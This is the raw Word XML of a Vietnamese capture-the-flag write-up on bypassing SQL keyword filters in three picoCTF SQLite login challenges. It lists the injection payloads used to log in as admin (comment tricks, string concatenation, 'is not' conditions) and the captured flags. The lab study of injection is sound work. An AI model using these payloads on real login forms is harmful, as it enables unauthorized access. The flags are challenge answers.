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6B6F" w14:textId="43490B1C" w:rsidR="00177189" w:rsidRPr="00177189" w:rsidRDefault="00177189" w:rsidP="00177189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177189">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗ hổng: SQL filter bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C44DF55" w14:textId="77777777" w:rsidR="00177189" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43761FEE" w14:textId="3C84EE0C" w:rsidR="002F49FE" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177189">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00177189">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đăng nhập với tư cách là admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD25DD" w14:textId="57927184" w:rsidR="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2819B3D0" w14:textId="4CB4B423" w:rsidR="009B7567" w:rsidRDefault="009B7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Cơ sở dữ liệu là SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F61EF4" w14:textId="6D0E471C" w:rsidR="00177189" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CB0085" w14:textId="4CD4660D" w:rsidR="00177189" w:rsidRPr="00177189" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00177189">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5BD8C4" w14:textId="0A27CAF9" w:rsidR="00177189" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A272F9" w14:textId="71C50180" w:rsidR="009B7567" w:rsidRDefault="009B75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Nhập mk bất kỳ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175099C5" w14:textId="77777777" w:rsidR="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5544814F" w14:textId="46F7464C" w:rsidR="00177189" w:rsidRDefault="001771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Round 1: or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9F5FF" w14:textId="668F16A5" w:rsidR="00177189" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F66D085" w14:textId="4429ECE8" w:rsidR="00177189" w:rsidRPr="009B7567" w:rsidRDefault="001771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Payload:</w:t>
      </w:r>
      <w:r w:rsidR="009B7567">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B7567" w:rsidRPr="009B7567">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA88F0" w14:textId="012420D4" w:rsidR="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620C1CFC" w14:textId="4B6F87A5" w:rsidR="009B7567" w:rsidRDefault="009B756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Round 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7567">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or and like = --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3921F" w14:textId="53F9662F" w:rsidR="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D1F863" w14:textId="4CA79925" w:rsidR="009B7567" w:rsidRPr="009B7567" w:rsidRDefault="009B7567">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="009B7567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admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA9E5A3" w14:textId="54AB06DE" w:rsidR="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28BDB9BE" w14:textId="1FBBDD6B" w:rsidR="009B7567" w:rsidRP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9B7567">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Round</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7567"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9B7567">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3: or and = like &gt; &lt; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27A4CD" w14:textId="5AE9FBC0" w:rsidR="009B7567" w:rsidRDefault="009B7567" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528B6C0E" w14:textId="49BD48ED" w:rsidR="009B7567" w:rsidRPr="009B7567" w:rsidRDefault="009B7567" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7567">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA37EE4" w14:textId="0447E605" w:rsidR="009B7567" w:rsidRP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C846FA5" w14:textId="1772552E" w:rsid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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7567">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Round</w:t>
      </w:r>
      <w:r w:rsidRPr="009B756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B7567">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4: or and = like &gt; &lt; -- admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183A7179" w14:textId="151FE56F" w:rsid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03B188D4" w14:textId="22C37BB2" w:rsid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Nó chặn admin rồi, mình dùng nối chuỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D28EA" w14:textId="36C77D43" w:rsid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1E1D4E88" w14:textId="4DE69538" w:rsidR="009B7567" w:rsidRDefault="009B7567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Payload: </w:t>
      </w:r>
      <w:r w:rsidR="00062BA8" w:rsidRPr="00062BA8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a'||'d'||'m'||'i'||'n'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F75BD0" w14:textId="298A0591" w:rsidR="00062BA8" w:rsidRDefault="00062BA8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2F045EB3" w14:textId="085F0EB8" w:rsidR="00062BA8" w:rsidRDefault="00062BA8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 w:rsidRPr="00062BA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Round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 w:rsidRPr="00062BA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5: or and = like &gt; &lt; -- union admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C45FFE" w14:textId="25A36120" w:rsidR="00062BA8" w:rsidRDefault="00062BA8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49E4F227" w14:textId="77777777" w:rsidR="00062BA8" w:rsidRDefault="00062BA8" w:rsidP="00062BA8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Tương tự: </w:t>
      </w:r>
      <w:r w:rsidRPr="00062BA8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a'||'d'||'m'||'i'||'n'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D1D7E7" w14:textId="51E91C4D" w:rsidR="00062BA8" w:rsidRDefault="00062BA8" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EF9A99" w14:textId="3AE16567" w:rsidR="00062BA8" w:rsidRPr="00062BA8" w:rsidRDefault="00062BA8" w:rsidP="009B7567">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00062BA8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 xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00062BA8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>picoCTF{y0u_m4d3_1t_d846125f7bdbf4d6e89cbc5edb6fa739}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB9D429" w14:textId="630D06DA" w:rsidR="009B7567" w:rsidRDefault="009B7567" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CCD0DC" w14:textId="4FE52070" w:rsidR="009B7567" w:rsidRDefault="009B7567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41A42FA" w14:textId="1E8845F1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CEFEF36" w14:textId="4BB8E174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EADFC48" w14:textId="6D20FC7A" w:rsidR="00062BA8" w:rsidRPr="00062BA8" w:rsidRDefault="00062BA8" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00062BA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bài 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582BB80" w14:textId="235FD5A0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8CC96B3" w14:textId="5B103D6D" w:rsidR="00CD1C28" w:rsidRDefault="00CD1C2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CD1C28">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Filters: or and true false union like = &gt; &lt; ; -- /* */ admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73433D0C" w14:textId="77777777" w:rsidR="00CD1C28" w:rsidRDefault="00CD1C2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E93107A" w14:textId="31CF2821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Cách làm cũng tương tự nhưng lần này nó bypass luôn /*. Khó nha </w:t>
      </w:r>
      <w:r w:rsidRPr="00062BA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEAC02" w14:textId="1BD9A724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07EDBE76" w14:textId="43D1AD81" w:rsidR="00062BA8" w:rsidRDefault="00CD1C2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Không nhập mk tùy ý nữa. </w:t>
      </w:r>
      <w:r w:rsidR="00062BA8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mình dùng toán tử điều kiện trong sqlite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C95C75" w14:textId="31ECF71B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2168AB8" w14:textId="43918E00" w:rsidR="00CD1C28" w:rsidRDefault="00CD1C2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Username:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00013A23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a'||'d'||'m'||'i'||'n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D22FB" w14:textId="31D3B1DB" w:rsidR="00CD1C28" w:rsidRDefault="00CD1C2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15AF1A6" w14:textId="2129FC87" w:rsidR="00CD1C28" w:rsidRPr="00013A23" w:rsidRDefault="00CD1C28" w:rsidP="009B7567">
      <w:pPr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Pass:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00013A23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a' is not 'b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BE393" w14:textId="27663E9E" w:rsidR="00062BA8" w:rsidRDefault="00062BA8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87D006D" w14:textId="7CA6C692" w:rsidR="00062BA8" w:rsidRDefault="00013A23" w:rsidP="009B7567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013A23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 xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00013A23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>picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0481C9EB" w14:textId="77777777" w:rsidR="00013A23" w:rsidRPr="00062BA8" w:rsidRDefault="00013A23" w:rsidP="009B7567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5500497" w14:textId="286E4E19" w:rsidR="009B7567" w:rsidRPr="004A0EC7" w:rsidRDefault="004A0EC7" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A0EC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6E2C9" w14:textId="4526FA5B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35F5DE3" w14:textId="19AF676F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Bộ lọc cũng giống vậy nhưng tk+mk bị giới hạn độ dài là 25. Vì vậy chỉnh lại payload trên là xong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FC30B" w14:textId="528A8644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274DAF8D" w14:textId="0BDEEE2B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Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A0EC7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ad'||'min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61019F2F" w14:textId="1644BACC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1BF4859C" w14:textId="0A04E9EF" w:rsidR="004A0EC7" w:rsidRPr="00013A23" w:rsidRDefault="004A0EC7" w:rsidP="004A0EC7">
      <w:pPr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Pass: </w:t>
      </w:r>
      <w:r w:rsidRPr="00013A23">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a' is not 'b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEED16" w14:textId="0EB67DCD" w:rsidR="004A0EC7" w:rsidRDefault="004A0EC7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14:paraId="06B1EFD0" w14:textId="1CAAD6B2" w:rsidR="004A0EC7" w:rsidRPr="003A5100" w:rsidRDefault="004A0EC7" w:rsidP="003A5100">
      <w:pPr>
        <w:ind w:right="-279"/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</w:pPr>
      <w:r w:rsidRPr="003A5100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 xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidR="003A5100" w:rsidRPr="003A5100"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  <w:t>picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B42E069" w14:textId="5FA7F5D5" w:rsidR="003A5100" w:rsidRPr="003A5100" w:rsidRDefault="003A5100" w:rsidP="003A5100">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB60183" w14:textId="0D7911C2" w:rsidR="004A0EC7" w:rsidRPr="004A0EC7" w:rsidRDefault="003A5100" w:rsidP="009B7567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Nhìn chung, 3 bài này tương đối dễ vì nó không lọc dấu nháy đơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6BE631" w14:textId="48114A98" w:rsidR="009B7567" w:rsidRPr="009B7567" w:rsidRDefault="009B7567" w:rsidP="009B7567">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4033581A" w14:textId="77777777" w:rsidR="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F015E6" w14:textId="77777777" w:rsidR="009B7567" w:rsidRPr="009B7567" w:rsidRDefault="009B7567">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6436C22C" w14:textId="77777777" w:rsidR="00177189" w:rsidRPr="00177189" w:rsidRDefault="00177189">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00177189" w:rsidRPr="0017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EDA1" w14:textId="77777777" w:rsidR="003F09FC" w:rsidRDefault="003F09FC" w:rsidP="00177189">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E0BEFF3" w14:textId="77777777" w:rsidR="003F09FC" w:rsidRDefault="003F09FC" w:rsidP="0017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176F" w14:textId="77777777" w:rsidR="003F09FC" w:rsidRDefault="003F09FC" w:rsidP="00177189">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4FBC84A9" w14:textId="77777777" w:rsidR="003F09FC" w:rsidRDefault="003F09FC" w:rsidP="0017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07"/>
    <w:rsid w:val="00013A23"/>
    <w:rsid w:val="00062BA8"/>
    <w:rsid w:val="00177189"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003A5100"/>
    <w:rsid w:val="003F09FC"/>
    <w:rsid w:val="004A0EC7"/>
    <w:rsid w:val="004A4C07"/>
    <w:rsid w:val="009B7567"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00CD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71FEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{842BA62E-1C1D-4349-8E83-CFB97E23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7718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177189"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0017718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7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2023-02-13T14:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-13T15:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>